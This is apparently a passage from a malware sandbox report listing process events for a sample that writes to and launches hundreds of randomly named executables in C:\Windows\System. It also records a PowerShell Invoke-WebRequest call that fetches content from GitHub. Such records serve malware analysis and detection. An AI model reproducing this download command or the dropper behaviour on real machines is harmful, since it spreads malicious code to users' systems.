PID 2188 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\nkeDzLC.exe
PID 2188 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\nkeDzLC.exe
PID 2188 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\BTGboBp.exe
PID 2188 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\BTGboBp.exe
PID 2188 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\BTGboBp.exe
PID 2188 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ZwhwJvD.exe
PID 2188 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ZwhwJvD.exe
PID 2188 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ZwhwJvD.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EYOmzPi.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EYOmzPi.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EYOmzPi.exe
PID 2188 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\LKzgEHS.exe
PID 2188 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\LKzgEHS.exe
PID 2188 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\LKzgEHS.exe
PID 2188 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\rdLXkiL.exe
PID 2188 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\rdLXkiL.exe
PID 2188 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\rdLXkiL.exe
PID 2188 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kTVcvFM.exe
PID 2188 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kTVcvFM.exe
PID 2188 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kTVcvFM.exe
PID 2188 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PhPkQly.exe
PID 2188 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PhPkQly.exe
PID 2188 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PhPkQly.exe
PID 2188 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\BPOpgtL.exe
PID 2188 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\BPOpgtL.exe
PID 2188 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\BPOpgtL.exe
PID 2188 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\muCNCDE.exe
PID 2188 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\muCNCDE.exe
PID 2188 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\muCNCDE.exe
PID 2188 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\pBiaQkw.exe
PID 2188 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\pBiaQkw.exe
PID 2188 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\pBiaQkw.exe
PID 2188 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SJJGYLn.exe
PID 2188 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SJJGYLn.exe
PID 2188 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SJJGYLn.exe
PID 2188 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\uLmFIOZ.exe
PID 2188 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\uLmFIOZ.exe
PID 2188 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\uLmFIOZ.exe
PID 2188 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\bMzZEQn.exe
PID 2188 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\bMzZEQn.exe
PID 2188 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\bMzZEQn.exe
PID 2188 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\YmLlxCv.exe
PID 2188 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\YmLlxCv.exe
PID 2188 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\YmLlxCv.exe
PID 2188 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\tGNzPVu.exe
PID 2188 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\tGNzPVu.exe
PID 2188 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\tGNzPVu.exe
PID 2188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\FEMMcVA.exe

Processes

C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\AgvdMNl.exe

C:\Windows\System\AgvdMNl.exe

C:\Windows\System\DCThHdf.exe

C:\Windows\System\DCThHdf.exe

C:\Windows\System\PpkXHcF.exe

C:\Windows\System\PpkXHcF.exe

C:\Windows\System\etfSnTw.exe

C:\Windows\System\etfSnTw.exe

C:\Windows\System\nkeDzLC.exe

C:\Windows\System\nkeDzLC.exe

C:\Windows\System\BTGboBp.exe

C:\Windows\System\BTGboBp.exe

C:\Windows\System\ZwhwJvD.exe

C:\Windows\System\ZwhwJvD.exe

C:\Windows\System\EYOmzPi.exe

C:\Windows\System\EYOmzPi.exe

C:\Windows\System\LKzgEHS.exe

C:\Windows\System\LKzgEHS.exe

C:\Windows\System\rdLXkiL.exe

C:\Windows\System\rdLXkiL.exe

C:\Windows\System\kTVcvFM.exe

C:\Windows\System\kTVcvFM.exe

C:\Windows\System\PhPkQly.exe

C:\Windows\System\PhPkQly.exe

C:\Windows\System\BPOpgtL.exe

C:\Windows\System\BPOpgtL.exe

C:\Windows\System\muCNCDE.exe

C:\Windows\System\muCNCDE.exe

C:\Windows\System\pBiaQkw.exe

C:\Windows\System\pBiaQkw.exe

C:\Windows\System\SJJGYLn.exe

C:\Windows\System\SJJGYLn.exe

C:\Windows\System\uLmFIOZ.exe

C:\Windows\System\uLmFIOZ.exe

C:\Windows\System\bMzZEQn.exe

C:\Windows\System\bMzZEQn.exe

C:\Windows\System\YmLlxCv.exe

C:\Windows\System\YmLlxCv.exe

C:\Windows\System\tGNzPVu.exe

C:\Windows\System\tGNzPVu.exe

C:\Windows\System\FEMMcVA.exe

C:\Windows\System\FEMMcVA.exe

C:\Windows\System\tJGmrrO.exe

C:\Windows\System\tJGmrrO.exe

C:\Windows\System\zbsIcyP.exe

C:\Windows\System\zbsIcyP.exe

C:\Windows\System\CuMLtNF.exe

C:\Windows\System\CuMLtNF.exe

C:\Windows\System\ZEMycPc.exe

C:\Windows\System\ZEMycPc.exe

C:\Windows\System\vdMBADI.exe

C:\Windows\System\vdMBADI.exe

C:\Windows\System\zohhpte.exe

C:\Windows\System\zohhpte.exe

C:\Windows\System\bCxQDbq.exe

C:\Windows\System\bCxQDbq.exe

C:\Windows\System\UgQNLyc.exe

C:\Windows\System\UgQNLyc.exe

C:\Windows\System\FEZZCsz.exe

C:\Windows\System\FEZZCsz.exe

C:\Windows\System\jcVeyxI.exe

C:\Windows\System\jcVeyxI.exe

C:\Windows\System\vciNTTy.exe

C:\Windows\System\vciNTTy.exe

C:\Windows\System\mbsBuCR.exe

C:\Windows\System\mbsBuCR.exe

C:\Windows\System\ecGchOy.exe

C:\Windows\System\ecGchOy.exe

C:\Windows\System\JXIjGBn.exe

C:\Windows\System\JXIjGBn.exe

C:\Windows\System\MUpOUrb.exe

C:\Windows\System\MUpOUrb.exe

C:\Windows\System\VuIrImT.exe

C:\Windows\System\VuIrImT.exe

C:\Windows\System\VrgYfda.exe

C:\Windows\System\VrgYfda.exe

C:\Windows\System\pDGldCQ.exe

C:\Windows\System\pDGldCQ.exe

C:\Windows\System\GECxbna.exe

C:\Windows\System\GECxbna.exe

C:\Windows\System\FPLQyzk.exe

C:\Windows\System\FPLQyzk.exe

C:\Windows\System\QXYkBfg.exe

C:\Windows\System\QXYkBfg.exe

C:\Windows\System\wZYehii.exe

C:\Windows\System\wZYehii.exe

C:\Windows\System\OqNkgdU.exe

C:\Windows\System\OqNkgdU.exe

C:\Windows\System\KPohYLF.exe

C:\Windows\System\KPohYLF.exe

C:\Windows\System\FbtKpah.exe

C:\Windows\System\FbtKpah.exe

C:\Windows\System\YbYxokm.exe

C:\Windows\System\YbYxokm.exe

C:\Windows\System\MKmYEAA.exe

C:\Windows\System\MKmYEAA.exe

C:\Windows\System\KSbUxHw.exe

C:\Windows\System\KSbUxHw.exe

C:\Windows\System\lSgrkQC.exe

C:\Windows\System\lSgrkQC.exe

C:\Windows\System\REKHsyK.exe

C:\Windows\System\REKHsyK.exe

C:\Windows\System\uZcfQsx.exe

C:\Windows\System\uZcfQsx.exe

C:\Windows\System\QwSjiiD.exe

C:\Windows\System\QwSjiiD.exe

C:\Windows\System\QpNuRKW.exe

C:\Windows\System\QpNuRKW.exe

C:\Windows\System\oSsFRgC.exe

C:\Windows\System\oSsFRgC.exe

C:\Windows\System\EdPXcUR.exe

C:\Windows\System\EdPXcUR.exe

C:\Windows\System\zQVLxRR.exe

C:\Windows\System\zQVLxRR.exe

C:\Windows\System\nZAlgVn.exe

C:\Windows\System\nZAlgVn.exe

C:\Windows\System\qEEqbnh.exe

C:\Windows\System\qEEqbnh.exe

C:\Windows\System\ZRMlKMD.exe

C:\Windows\System\ZRMlKMD.exe

C:\Windows\System\QnVFDKn.exe

C:\Windows\System\QnVFDKn.exe

C:\Windows\System\BaalHLV.exe

C:\Windows\System\BaalHLV.exe

C:\Windows\System\IWPdikM.exe

C:\Windows\System\IWPdikM.exe

C:\Windows\System\pwPEvmS.exe

C:\Windows\System\pwPEvmS.exe

C:\Windows\System\OMGUsGA.exe

C:\Windows\System\OMGUsGA.exe

C:\Windows\System\DGXQBJm.exe

C:\Windows\System\DGXQBJm.exe

C:\Windows\System\pwakhkj.exe

C:\Windows\System\pwakhkj.exe

C:\Windows\System\EzQRlhQ.exe

C:\Windows\System\EzQRlhQ.exe

C:\Windows\System\luXHwKt.exe

C:\Windows\System\luXHwKt.exe

C:\Windows\System\EckvNxm.exe

C:\Windows\System\EckvNxm.exe

C:\Windows\System\OaAIOHL.exe

C:\Windows\System\OaAIOHL.exe

C:\Windows\System\WxPgwsm.exe

C:\Windows\System\WxPgwsm.exe

C:\Windows\System\jqRsrYN.exe

C:\Windows\System\jqRsrYN.exe

C:\Windows\System\qxYsGiw.exe

C:\Windows\System\qxYsGiw.exe

C:\Windows\System\mxlcpAa.exe

C:\Windows\System\mxlcpAa.exe

C:\Windows\System\ZPQByaP.exe

C:\Windows\System\ZPQByaP.exe

C:\Windows\System\CTkTVTS.exe

C:\Windows\System\CTkTVTS.exe

C:\Windows\System\nvGythJ.exe

C:\Windows\System\nvGythJ.exe

C:\Windows\System\nFxiatH.exe

C:\Windows\System\nFxiatH.exe

C:\Windows\System\mQbVggF.exe

C:\Windows\System\mQbVggF.exe

C:\Windows\System\zEEwUwH.exe

C:\Windows\System\zEEwUwH.exe

C:\Windows\System\LFCuSQu.exe

C:\Windows\System\LFCuSQu.exe

C:\Windows\System\zvinxjG.exe

C:\Windows\System\zvinxjG.exe

C:\Windows\System\MbHtnVn.exe

C:\Windows\System\MbHtnVn.exe

C:\Windows\System\yhYWoiO.exe

C:\Windows\System\yhYWoiO.exe

C:\Windows\System\UbvDgHG.exe

C:\Windows\System\UbvDgHG.exe

C:\Windows\System\ELGRHDz.exe

C:\Windows\System\ELGRHDz.exe

C:\Windows\System\wctEqUp.exe

C:\Windows\System\wctEqUp.exe

C:\Windows\System\BLSPjpf.exe

C:\Windows\System\BLSPjpf.exe

C:\Windows\System\qzFqnrP.exe

C:\Windows\System\qzFqnrP.exe

C:\Windows\System\eACBFoM.exe

C:\Windows\System\eACBFoM.exe

C:\Windows\System\JiKOGuP.exe

C:\Windows\System\JiKOGuP.exe

C:\Windows\System\hktpdCy.exe

C:\Windows\System\hktpdCy.exe

C:\Windows\System\eIMHuss.exe

C:\Windows\System\eIMHuss.exe

C:\Windows\System\ItOCYDy.exe

C:\Windows\System\ItOCYDy.exe

C:\Windows\System\OSVKZiz.exe

C:\Windows\System\OSVKZiz.exe

C:\Windows\System\EpXFgpg.exe

C:\Windows\System\EpXFgpg.exe

C:\Windows\System\vrHtmTS.exe

C:\Windows\System\vrHtmTS.exe

C:\Windows\System\NEHHPhG.exe

C:\Windows\System\NEHHPhG.exe

C:\Windows\System\jbpogvz.exe

C:\Windows\System\jbpogvz.exe

C:\Windows\System\fEkobEF.exe

C:\Windows\System\fEkobEF.exe

C:\Windows\System\amKiGwY.exe

C:\Windows\System\amKiGwY.exe

C:\Windows\System\pEKBWCL.exe

C:\Windows\System\pEKBWCL.exe

C:\Windows\System\CjgjHjY.exe

C:\Windows\System\CjgjHjY.exe

C:\Windows\System\YjeMMZx.exe

C:\Windows\System\YjeMMZx.exe

C:\Windows\System\rrDjfER.exe

C:\Windows\System\rrDjfER.exe

C:\Windows\System\ejjrcbz.exe

C:\Windows\System\ejjrcbz.exe

C:\Windows\System\urvdSeQ.exe

C:\Windows\System\urvdSeQ.exe

C:\Windows\System\tiWiEkB.exe

C:\Windows\System\tiWiEkB.exe

C:\Windows\System\FYRWQhE.exe

C:\Windows\System\FYRWQhE.exe

C:\Windows\System\iBGkFYI.exe

C:\Windows\System\iBGkFYI.exe

C:\Windows\System\QuGNYWK.exe

C:\Windows\System\QuGNYWK.exe

C:\Windows\System\MdpQfvq.exe

C:\Windows\System\MdpQfvq.exe

C:\Windows\System\SForCDu.exe

C:\Windows\System\SForCDu.exe

C:\Windows\System\fQyEzPD.exe

C:\Windows\System\fQyEzPD.exe

C:\Windows\System\uIpvaXq.exe

C:\Windows\System\uIpvaXq.exe

C:\Windows\System\BCgSYdY.exe

C:\Windows\System\BCgSYdY.exe

C:\Windows\System\QltgkFb.exe

C:\Windows\System\QltgkFb.exe

C:\Windows\System\ICHyIZE.exe

C:\Windows\System\ICHyIZE.exe

C:\Windows\System\PNJfcPT.exe

C:\Windows\System\PNJfcPT.exe

C:\Windows\System\ybnNMYH.exe

C:\Windows\System\ybnNMYH.exe

C:\Windows\System\ObvjkKQ.exe

C:\Windows\System\ObvjkKQ.exe

C:\Windows\System\BcGSPsD.exe

C:\Windows\System\BcGSPsD.exe

C:\Windows\System\WxKsxIn.exe

C:\Windows\System\WxKsxIn.exe

C:\Windows\System\bSaYoOu.exe

C:\Windows\System\bSaYoOu.exe

C:\Windows\System\ZNPTzoQ.exe

C:\Windows\System\ZNPTzoQ.exe

C:\Windows\System\SBrXuhC.exe

C:\Windows\System\SBrXuhC.exe

C:\Windows\System\UTRSKmG.exe

C:\Windows\System\UTRSKmG.exe

C:\Windows\System\NCdyzcH.exe

C:\Windows\System\NCdyzcH.exe

C:\Windows\System\mAYspto.exe

C:\Windows\System\mAYspto.exe

C:\Windows\System\HkxcwAv.exe

C:\Windows\System\HkxcwAv.exe

C:\Windows\System\YTMNKQl.exe

C:\Windows\System\YTMNKQl.exe

C:\Windows\System\rBtGoZb.exe

C:\Windows\System\rBtGoZb.exe

C:\Windows\System\ScNIKOQ.exe

C:\Windows\System\ScNIKOQ.exe

C:\Windows\System\ByRtgnU.exe

C:\Windows\System\ByRtgnU.exe

C:\Windows\System\HPZNffp.exe

C:\Windows\System\HPZNffp.exe

C:\Windows\System\halUNSF.exe

C:\Windows\System\halUNSF.exe

C:\Windows\System\MuZsYxI.exe

C:\Windows\System\MuZsYxI.exe

C:\Windows\System\gMeuYqy.exe

C:\Windows\System\gMeuYqy.exe

C:\Windows\System\pXnOwRy.exe

C:\Windows\System\pXnOwRy.exe

C:\Windows\System\vYDbXTS.exe

C:\Windows\System\vYDbXTS.exe

C:\Windows\System\iKUjfuu.exe

C:\Windows\System\iKUjfuu.exe

C:\Windows\System\aciuQLW.exe

C:\Windows\System\aciuQLW.exe

C:\Windows\System\GAdrFMy.exe

C:\Windows\System\GAdrFMy.exe

C:\Windows\System\VFxOPTa.exe

C:\Windows\System\VFxOPTa.exe

C:\Windows\System\GbKVzyn.exe

C:\Windows\System\GbKVzyn.exe

C:\Windows\System\rVWYqzI.exe

C:\Windows\System\rVWYqzI.exe

C:\Windows\System\poLPiaR.exe

C:\Windows\System\poLPiaR.exe

C:\Windows\System\PLUGXPG.exe

C:\Windows\System\PLUGXPG.exe

C:\Windows\System\IhrrZVk.exe

C:\Windows\System\IhrrZVk.exe

C:\Windows\System\LqTrBgE.exe

C:\Windows\System\LqTrBgE.exe

C:\Windows\System\eqyAhfD.exe

C:\Windows\System\eqyAhfD.exe

C:\Windows\System\MKVAGRb.exe

C:\Windows\System\MKVAGRb.exe

C:\Windows\System\lBzRPmo.exe

C:\Windows\System\lBzRPmo.exe

C:\Windows\System\oAKvKaF.exe

C:\Windows\System\oAKvKaF.exe

C:\Windows\System\BaFxAWy.exe

C:\Windows\System\BaFxAWy.exe

C:\Windows\System\ueXnIua.exe

C:\Windows\System\ueXnIua.exe

C:\Windows\System\RSuhlBR.exe

C:\Windows\System\RSuhlBR.exe

C:\Windows\System\CCKTCec.exe

C:\Windows\System\CCKTCec.exe

C:\Windows\System\VhaxyoH.exe

C:\Windows\System\VhaxyoH.exe

C:\Windows\System\YxgGlqo.exe

C:\Windows\System\YxgGlqo.exe

C:\Windows\System\kHEtAil.exe

C:\Windows\System\kHEtAil.exe

C:\Windows\System\craqYgT.exe

C:\Windows\System\craqYgT.exe

C:\Windows\System\zREibZA.exe

C:\Windows\System\zREibZA.exe

C:\Windows\System\ZHkwnYG.exe

C:\Windows\System\ZHkwnYG.exe

C:\Windows\System\snaYVXi.exe

C:\Windows\System\snaYVXi.exe

C:\Windows\System\LEVWLTK.exe

C:\Windows\System\LEVWLTK.exe

C:\Windows\System\SYjfYnc.exe

C:\Windows\System\SYjfYnc.exe

C:\Windows\System\NyvYacE.exe

C:\Windows\System\NyvYacE.exe

C:\Windows\System\RVPguFo.exe

C:\Windows\System\RVPguFo.exe

C:\Windows\System\sjOSEyO.exe

C:\Windows\System\sjOSEyO.exe

C:\Windows\System\BvQCgRc.exe

C:\Windows\System\BvQCgRc.exe

C:\Windows\System\giddKcn.exe

C:\Windows\System\giddKcn.exe

C:\Windows\System\CzBgCOT.exe

C:\Windows\System\CzBgCOT.exe

C:\Windows\System\aFrOoVw.exe

C:\Windows\System\aFrOoVw.exe

C:\Windows\System\gGDzmoO.exe

C:\Windows\System\gGDzmoO.exe

C:\Windows\System\PTNhcUd.exe

C:\Windows\System\PTNhcUd.exe

C:\Windows\System\DmBZdVJ.exe

C:\Windows\System\DmBZdVJ.exe

C:\Windows\System\wYGjLDu.exe

C:\Windows\System\wYGjLDu.exe

C:\Windows\System\kKRvnzg.exe

C:\Windows\System\kKRvnzg.exe

C:\Windows\System\dozfbDw.exe

C:\Windows\System\dozfbDw.exe

C:\Windows\System\VoYOHhg.exe

C:\Windows\System\VoYOHhg.exe

C:\Windows\System\mtiMqgg.exe

C:\Windows\System\mtiMqgg.exe

C:\Windows\System\HTqSqcy.exe

C:\Windows\System\HTqSqcy.exe

C:\Windows\System\fwACfgV.exe

C:\Windows\System\fwACfgV.exe

C:\Windows\System\dyjMJjN.exe

C:\Windows\System\dyjMJjN.exe

C:\Windows\System\UZGRdnT.exe

C:\Windows\System\UZGRdnT.exe

C:\Windows\System\lcemMwf.exe

C:\Windows\System\lcemMwf.exe

C:\Windows\System\GqhyZhL.exe

C:\Windows\System\GqhyZhL.exe

C:\Windows\System\bvKVOSM.exe

C:\Windows\System\bvKVOSM.exe

C:\Windows\System\lwzRqmN.exe

C:\Windows\System\lwzRqmN.exe

C:\Windows\System\rqjucul.exe

C:\Windows\System\rqjucul.exe

C:\Windows\System\OMxYmoz.exe

C:\Windows\System\OMxYmoz.exe

C:\Windows\System\pamHncU.exe

C:\Windows\System\pamHncU.exe

C:\Windows\System\UlVKQqq.exe

C:\Windows\System\UlVKQqq.exe

C:\Windows\System\FXqCfda.exe

C:\Windows\System\FXqCfda.exe

C:\Windows\System\ctsikMv.exe

C:\Windows\System\ctsikMv.exe

C:\Windows\System\UHZQvsf.exe

C:\Windows\System\UHZQvsf.exe

C:\Windows\System\hKZBptx.exe

C:\Windows\System\hKZBptx.exe

C:\Windows\System\ljUwTiX.exe

C:\Windows\System\ljUwTiX.exe

C:\Windows\System\YFQFDiF.exe

C:\Windows\System\YFQFDiF.exe

C:\Windows\System\pRfiJDL.exe

C:\Windows\System\pRfiJDL.exe

C:\Windows\System\dJDPKDx.exe

C:\Windows\System\dJDPKDx.exe

C:\Windows\System\GzZwhAU.exe

C:\Windows\System\GzZwhAU.exe

C:\Windows\System\gOWBjDa.exe

C:\Windows\System\gOWBjDa.exe

C:\Windows\System\ahpoJDA.exe

C:\Windows\System\ahpoJDA.exe

C:\Windows\System\HafKajm.exe

C:\Windows\System\HafKajm.exe

C:\Windows\System\VNTCfPC.exe

C:\Windows\System\VNTCfPC.exe

C:\Windows\System\KdMVeSp.exe

C:\Windows\System\KdMVeSp.exe

C:\Windows\System\teLKMYL.exe

C:\Windows\System\teLKMYL.exe

C:\Windows\System\WhXuxaF.exe

C:\Windows\System\WhXuxaF.exe

C:\Windows\System\czCpVZH.exe

C:\Windows\System\czCpVZH.exe

C:\Windows\System\XKBgLfV.exe

C:\Windows\System\XKBgLfV.exe

C:\Windows\System\OaJfJDJ.exe

C:\Windows\System\OaJfJDJ.exe

C:\Windows\System\gBHgnju.exe

C:\Windows\System\gBHgnju.exe

C:\Windows\System\nCIpCwQ.exe

C:\Windows\System\nCIpCwQ.exe

C:\Windows\System\TjsJdRI.exe

C:\Windows\System\TjsJdRI.exe

C:\Windows\System\jZhaxIj.exe

C:\Windows\System\jZhaxIj.exe

C:\Windows\System\fCgDwzV.exe

C:\Windows\System\fCgDwzV.exe

C:\Windows\System\XEuPDKZ.exe

C:\Windows\System\XEuPDKZ.exe

C:\Windows\System\fMqgEYh.exe

C:\Windows\System\fMqgEYh.exe

C:\Windows\System\qEmzswP.exe

C:\Windows\System\qEmzswP.exe

C:\Windows\System\SedDEuj.exe

C:\Windows\System\SedDEuj.exe

C:\Windows\System\HuaawFh.exe

C:\Windows\System\HuaawFh.exe

C:\Windows\System\CdwueQh.exe

C:\Windows\System\CdwueQh.exe

C:\Windows\System\xYOrRZj.exe

C:\Windows\System\xYOrRZj.exe

C:\Windows\System\faqDUCf.exe

C:\Windows\System\faqDUCf.exe

C:\Windows\System\NGCIqkN.exe

C:\Windows\System\NGCIqkN.exe

C:\Windows\System\eAxyUou.exe

C:\Windows\System\eAxyUou.exe

C:\Windows\System\zYdvPQl.exe

C:\Windows\System\zYdvPQl.exe

C:\Windows\System\OLyXAtG.exe

C:\Windows\System\OLyXAtG.exe

C:\Windows\System\FHOpHhy.exe

C:\Windows\System\FHOpHhy.exe

C:\Windows\System\fITtzEm.exe

C:\Windows\System\fITtzEm.exe

C:\Windows\System\CQTGgFO.exe

C:\Windows\System\CQTGgFO.exe

C:\Windows\System\JoWEylt.exe

C:\Windows\System\JoWEylt.exe

C:\Windows\System\lnfYFmZ.exe

C:\Windows\System\lnfYFmZ.exe

C:\Windows\System\DTxWRcP.exe

C:\Windows\System\DTxWRcP.exe

C:\Windows\System\lxLhQoD.exe

C:\Windows\System\lxLhQoD.exe

C:\Windows\System\AZyIEnA.exe

C:\Windows\System\AZyIEnA.exe

C:\Windows\System\znDMBpx.exe

C:\Windows\System\znDMBpx.exe

C:\Windows\System\wtDZNSl.exe

C:\Windows\System\wtDZNSl.exe

C:\Windows\System\YDiWNbS.exe

C:\Windows\System\YDiWNbS.exe

C:\Windows\System\NmfthqA.exe

C:\Windows\System\NmfthqA.exe

C:\Windows\System\sbfngMa.exe

C:\Windows\System\sbfngMa.exe

C:\Windows\System\dsCXsRy.exe

C:\Windows\System\dsCXsRy.exe

C:\Windows\System\wvStFOK.exe

C:\Windows\System\wvStFOK.exe

C:\Windows\System\GqHtovD.exe

C:\Windows\System\GqHtovD.exe

C:\Windows\System\ytkuWdR.exe

C:\Windows\System\ytkuWdR.exe

C:\Windows\System\xxQDdZU.exe

C:\Windows\System\xxQDdZU.exe

C:\Windows\System\wvACcGX.exe

C:\Windows\System\wvACcGX.exe

C:\Windows\System\mrNCYua.exe

C:\Windows\System\mrNCYua.exe

C:\Windows\System\JahwaVV.exe

C:\Windows\System\JahwaVV.exe

C:\Windows\System\kkoiFXs.exe

C:\Windows\System\kkoiFXs.exe

C:\Windows\System\GsvjFlQ.exe

C:\Windows\System\GsvjFlQ.exe

C:\Windows\System\SltUxcI.exe

C:\Windows\System\SltUxcI.exe

C:\Windows\System\JLucLNK.exe

C:\Windows\System\JLucLNK.exe

C:\Windows\System\YNdLxIk.exe

C:\Windows\System\YNdLxIk.exe

C:\Windows\System\cyEYOLH.exe

C:\Windows\System\cyEYOLH.exe

C:\Windows\System\lXdKnoD.exe

C:\Windows\System\lXdKnoD.exe

C:\Windows\System\MGsiUiT.exe

C:\Windows\System\MGsiUiT.exe

C:\Windows\System\qyDJPFe.exe

C:\Windows\System\qyDJPFe.exe

C:\Windows\System\dWrILke.exe

C:\Windows\System\dWrILke.exe

C:\Windows\System\jwUmpcv.exe

C:\Windows\System\jwUmpcv.exe

C:\Windows\System\CQgadAj.exe

C:\Windows\System\CQgadAj.exe

C:\Windows\System\xmFRkuD.exe

C:\Windows\System\xmFRkuD.exe

C:\Windows\System\XwiNjdd.exe

C:\Windows\System\XwiNjdd.exe

C:\Windows\System\WmteYwC.exe

